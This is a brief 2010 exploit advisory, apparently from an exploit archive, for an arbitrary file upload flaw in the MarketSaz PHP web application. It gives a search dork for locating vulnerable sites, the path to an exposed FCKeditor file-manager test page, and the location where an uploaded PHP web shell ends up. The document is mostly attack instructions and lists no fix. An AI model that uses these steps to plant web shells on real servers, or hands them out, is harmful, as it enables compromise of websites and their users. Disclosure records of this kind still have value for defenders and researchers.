MarketSaz Remote Arbitrary File Upload Vulnerability

2010-06-19 09:18:46

==========================================
MarketSaz remote file Upload Vulnerability
==========================================


#Exploit Title: MarketSaz remote file uploade

#Author: NetQurd ([email protected])

#Dork : English = Powered MarketSaz


#Software Link: http://www.marketsaz.com

#Platform :linux/php

#Exploit : http://target.com

#http://target.com/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#Example site: http://server

#Select the "File Upload" To use = php

#http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

#Sh3ll : http://server/admin/view/javascript/fckeditor/editor/filemanager/connectors/php/shell.php

#OR

#http://server/shell.php
# Spical Thanks To Net.Edit0r ([email protected])

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.